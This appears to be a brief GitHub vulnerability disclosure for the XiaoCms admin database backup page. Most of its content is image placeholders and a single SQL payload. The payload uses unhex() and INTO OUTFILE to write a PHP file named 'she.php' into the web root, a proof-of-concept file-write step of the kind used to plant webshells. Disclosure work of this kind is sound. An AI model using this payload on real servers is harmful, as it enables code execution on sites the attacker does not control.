Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
23 lines (13 sloc) 780 Bytes

Vulnerabilities in database backup page

image-20190103165306686

This function is located XiaoCms\admin\controller\database.php

image-20190103170720605

capture the packet,execute SQL command

image-20190103170640434

`; select unhex('3C3F70687020706870696E666F28293B') INTO OUTFILE 'C:/phpStudy/PHPTutorial/WWW/xiaocms/she.php'; `;

image-20190103170900567

image-20190103171146519

image-20190103171213687

image-20190103171234340